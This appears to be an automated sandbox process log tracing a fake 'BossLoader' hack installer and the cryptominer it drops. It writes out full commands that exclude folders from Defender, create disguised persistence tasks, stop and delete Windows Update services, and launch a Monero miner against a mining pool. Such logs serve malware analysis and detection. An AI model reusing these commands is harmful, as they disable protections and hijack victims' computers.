C:\Program Files\WinZip\adxregistrator.exe"C:\Program Files\WinZip\adxregistrator.exe" /install="C:\Program Files\WinZip\WinZipExpressForOffice.dll" /privileges=user /GenerateLogFile=false3⤵
- Executes dropped EXE
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks /Create /SC DAILY /TN "WinZip Update Notifier 1" /TR "\"C:\Program Files\WinZip\WZUpdateNotifier.exe\" -checkType=\"scheduled_9AM\" -show" /ST 09:22 /F3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks /Create /SC DAILY /TN "WinZip Update Notifier 2" /TR "\"C:\Program Files\WinZip\WZUpdateNotifier.exe\" -checkType=\"scheduled_12PM\" -show" /ST 12:22 /F3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeC:\Windows\SysWOW64\schtasks /Create /SC DAILY /TN "WinZip Update Notifier 3" /TR "\"C:\Program Files\WinZip\WZUpdateNotifier.exe\" -checkType=\"scheduled_3PM\" -show" /ST 15:22 /F3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding CD82D58F85CDE6376ED467B01DE3FC5D E Global\MSI00002⤵
- Registers COM server for autorun
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files\WinZip\adxregistrator.exe"C:\Program Files\WinZip\adxregistrator.exe" /install="C:\Program Files\WinZip\WinZipExpressForOffice.dll" /privileges=admin /GenerateLogFile=false3⤵
- Executes dropped EXE
- Registers COM server for autorun
- Modifies data under HKEY_USERS
- Modifies registry class
-
-
-
C:\Program Files\WinZip\WzPreviewer64.exe"C:\Program Files\WinZip\WzPreviewer64.exe" -regserver winzip642⤵
- Executes dropped EXE
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Program Files\WinZip\WzPreloader.exe"C:\Program Files\WinZip\WzPreloader.exe"2⤵
- Executes dropped EXE
-
-
C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe" /noqp /nodesktop /nostartmenu /nomenugroup /autoinstall /lang 10332⤵
- Modifies system executable filetype association
- Executes dropped EXE
- Registers COM server for autorun
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
-
-
-
C:\Program Files\WinZip\WzUpdater.exe"C:\Program Files\WinZip\WzUpdater.exe" /schedule2⤵
- Executes dropped EXE
-
-
C:\Program Files\WinZip\WZUpdateNotifier.exe"C:\Program Files\WinZip\WZUpdateNotifier.exe"2⤵
- Executes dropped EXE
-
-
C:\Program Files\WinZip\WzBGTComServer64.exe"C:\Program Files\WinZip\WzBGTComServer64.exe" /REGSERVER2⤵
- Executes dropped EXE
- Registers COM server for autorun
-
-
C:\Program Files\WinZip\WzBGTools64.exe"C:\Program Files\WinZip\WzBGTools64.exe" /s2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"1⤵
-
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir6108_1967063174\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir6108_1967063174\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={13420734-28c5-4208-9825-5fc026d0a722} --system2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 1284 -ip 12841⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.winzip.com/instcmplt.cgi?pid=WNZP&ver=27.0.15240.0&lang=en&osbits=64&vid=ppcn&x-at=ppcn1⤵
- Adds Run key to start application
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0x11c,0x120,0xd0,0x124,0x7ffed58b46f8,0x7ffed58b4708,0x7ffed58b47182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,4298572389587027800,1078927014912284844,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,4298572389587027800,1078927014912284844,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:32⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,4298572389587027800,1078927014912284844,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,4298572389587027800,1078927014912284844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3776 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,4298572389587027800,1078927014912284844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2068,4298572389587027800,1078927014912284844,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4936 /prefetch:82⤵
-
-
C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe"1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe" "C:\Users\Admin\Downloads\Hacks-BossLoader.zip"1⤵
- Executes dropped EXE
- Checks computer location settings
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"2⤵
- Executes dropped EXE
-
-
C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe" "C:\Users\Admin\Downloads\Hacks-BossLoader.zip"1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe" "C:\Users\Admin\Downloads\Hacks-BossLoader.zip"1⤵
- Executes dropped EXE
- Checks computer location settings
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"2⤵
- Executes dropped EXE
-
-
C:\Program Files\WinZip\WzWipe32.exe"C:\Program Files\WinZip\WzWipe32.exe" "C:\Users\Admin\AppData\Local\Temp\wzf09a" /nWinZip2⤵
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\72c81c61d7bc47b8be5eca73774d63c9 /t 5564 /p 56481⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵
-
C:\ProgramData\winrar\OWT.exeC:\ProgramData\winrar\OWT.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Executes dropped EXE
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1632 -s 39202⤵
- Program crash
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\e15d705ef5fc4f1cb87ba5b26106f8cb /t 2468 /p 55601⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 480 -p 1632 -ip 16321⤵
-
C:\Users\Admin\Desktop\BossLoader - Installer.exe"C:\Users\Admin\Desktop\BossLoader - Installer.exe"1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYQBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAdgBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAbQBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbQB5ACMAPgA="2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\BossLoader.exe"C:\Users\Admin\AppData\Local\Temp\BossLoader.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-E1BD4.tmp\BossLoader.tmp"C:\Users\Admin\AppData\Local\Temp\is-E1BD4.tmp\BossLoader.tmp" /SL5="$F03F8,40717895,956416,C:\Users\Admin\AppData\Local\Temp\BossLoader.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\BossLoader\BossLoader.exe"C:\Program Files (x86)\BossLoader\BossLoader.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 9445⤵
- Program crash
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\InstallerGUI.exe"C:\Users\Admin\AppData\Local\Temp\InstallerGUI.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
-
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
- Modifies security service
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wkdny#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'SDIUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\SubmitDiagInfor.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\SubmitDiagInfor.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'SDIUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SDIUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\SubmitDiagInfor.exe' }3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#euhwzx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "SDIUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\SubmitDiagInfor.exe" }3⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn SDIUpdateTaskMachineQC4⤵
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4552 -ip 45521⤵
-
C:\Program Files (x86)\BossLoader\BossLoader.exe"C:\Program Files (x86)\BossLoader\BossLoader.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 16802⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4416 -ip 44161⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
-
C:\Program Files (x86)\BossLoader\BossLoader.exe"C:\Program Files (x86)\BossLoader\BossLoader.exe"1⤵
- Executes dropped EXE
- Registers COM server for autorun
- Checks computer location settings
- Modifies Control Panel
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 30842⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5468 -ip 54681⤵
-
C:\Program Files\Google\Chrome\SubmitDiagInfor.exe"C:\Program Files\Google\Chrome\SubmitDiagInfor.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wkdny#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'SDIUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\SubmitDiagInfor.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\SubmitDiagInfor.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'SDIUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SDIUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\SubmitDiagInfor.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe rvznhbods2⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
-
-
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe xpctnqxmbsxyrloy 6E3sjfZq2rJQaxvLPmXgsCZAIMpmPntHEIWDH08V2Q38oDzy/Cqli7gBy2CefOtprt2OEp3rTyObXS159OljhIIR2CQtrSkaUI0XZRzFJppXmNguPzLgygZeKs0u8s1arSFKgkUYmXrRt2kwwg7oK6i6B8ZmR1hXlVUb23vhk2aczkXLmv0aQfwRUjx32PUZqVR3gQNr/7+/Al8rVZAI3JvUwwnX00SRHFqf1kC4K38w/AXGz3L7rWZ9H5YfQxWO8r62aKbLe+gh+qY7yiuGOtHDnShTdbykonfdKQOzM07djL+LxP9jXwLcz+rSmvyaSnSXxo/zuQfJ7VjkDmCi16M6NrnRB7h3miI7LOtpkBcnqsWxW61tnxo2P5IhPXi3F0+vYIaaMixOZoMU7ZFnBx4MiFn5BccOHcKcG3cwAmDbLsEdNLKxHzPgE9SN78/YIAymGspbM41AuRoypVgkbcFRMZrHRMZnWhEznJI+JxOokw8QQTdmBuxy+N675nQuq7pk6rfoFlipFZimUW4Am2xCTFlCR2vXoWmXPlnE+661ub6WiZXBzH/B1+qYexlMROy5Fg+si9h0QCSLNIBXVoRk5na263uZxiyZNN+E2xepS7WE/xZAITU00uIV1cYSlNGfGEIK00kTQYKjF+f1cF+Ey08gSYIEXqz5YVL14wZBD79LyXcBd/jIXpFn7++ynL58NhfNpIKGZPATccd/Dwahk880uVu++wM0RaPkeN72T6CqnSeFXotmWg6XwUiuBcPW09y+zUNaywVR7hKGnbwwZieT5TX+1+U3EJ2rpYCdw8MShwjP+6IIJpRSFuCppKGr8Wq545Hzblt3CMa9Gdqm5vGlGjZiNihnhji0fh/qtKd3GUVryaImXLgRZU4Wb67fhXHM5eKLOqt1isU9rYPl4a5lVsJfMsdZHuDmeAkm0ga62sMBLtaaME7XaEQu2HIB0pTh7zK5byJtnyOEua+9XbSxtxnCDksmxZ5jw9jQhDadPxo2exKtJS9+G0Hu6302oT8o20kcPXUDe2szV5k/fhpmjb+665q2gs5xLDUEJukVIfWlToet/YD/SeYV95ATExrChULgYgDCsIcFw4KPNC71oFNt6y17nJrStFuwjz8V9sD2/nTOBkGREuKMCU7x9yUebvo4Pl9r7rhE+j1DOZsaNHr4v8HpNqZm8zkhcWKCOj9Rj+LVfYkweA5iUJBrEYvrttLpvW+vi5vlTbOg4UyEnBaw9MXA8vvQRDC/RxSzgJDc4M5s8EqgsxqQ2uFLMIEB8nA08jwvinuG8PKd1x7vpYu/6NOu8QWuqNcLGPphqZufRmYoEcjk0lWGQ0oqefZOMJArtZhZxPMLG12C5ogKmfK7PFrFTO6s4EPbteivkp5S3rusZgPocqsUpenmbSnMkprMv4IISCK4kD5BCoXhZyZFBNfQth4dn5xzfeWFODPk6vvPkm3ByjgrwYA8eQrtzLTkcfRFEjtaDtltcTAFAJ4XUuHlWjUCamonqjRH2F1twbdC4W/VfCsJFDcSljlBd8iQ/l04p/LLSNsZH6s7dblHoPPzwgra3vwMpKBSJA0qIb/SlH/6j7Q8ebGH3pbMmCvrLrf3wzkwvreJ813Yidq1ILo8o0kbJ4aK90zUmnU8moz+6y/siForHzK6WynbYapek2++Rxfei/giGM3VNokvJN9U4PYcKlP3d4hGOALzGDNIX+a7Af8C2⤵
-
-
C:\Program Files\Hola\app\net_updater64.exe"C:/Program Files/Hola/app/net_updater64.exe" --updater win_hola.browser.hola.org1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- NTFS ADS
-
C:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\test_wpf.exeC:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\test_wpf.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
-
C:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\idle_report.exeC:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\idle_report.exe --id 27570 --screen2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
-
C:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\idle_report.exeC:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\idle_report.exe --id 545472⤵
- Drops file in System32 directory
-
-
C:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\idle_report.exeC:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\idle_report.exe --id 608062⤵
- Drops file in System32 directory
-
-
C:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\idle_report.exeC:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\idle_report.exe --id 817902⤵
- Drops file in System32 directory
-
-
C:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\idle_report.exeC:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\idle_report.exe --id 400602⤵
- Drops file in System32 directory
-
-
C:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\idle_report.exeC:\ProgramData\BrightData\108a47921d08860d64656218998ab66204caf497\idle_report.exe --id 158962⤵
- Drops file in System32 directory
-
-
C:\Program Files\Hola\app\hola_svc.exe"C:\Program Files\Hola\app\hola_svc.exe" --service1⤵
- Executes dropped EXE
-
C:\Windows\system32\rasdial.exerasdial2⤵
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY HKLM\Software\Hola /v install_ts2⤵
- Modifies registry key
-
-
C:\Program Files\Hola\app\hola_svc.exe"C:\Program Files\Hola\app\hola_svc.exe" --report-idle2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY HKLM\Software\Hola /v install_appid2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY HKLM\Software\Hola /v install_campaign2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY HKLM\Software\Hola /v uuid2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY HKLM\Software\Hola /v after_update2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD HKLM\Software\Hola /v after_update /t REG_SZ /d 1 /f2⤵
- Modifies registry key
-
-
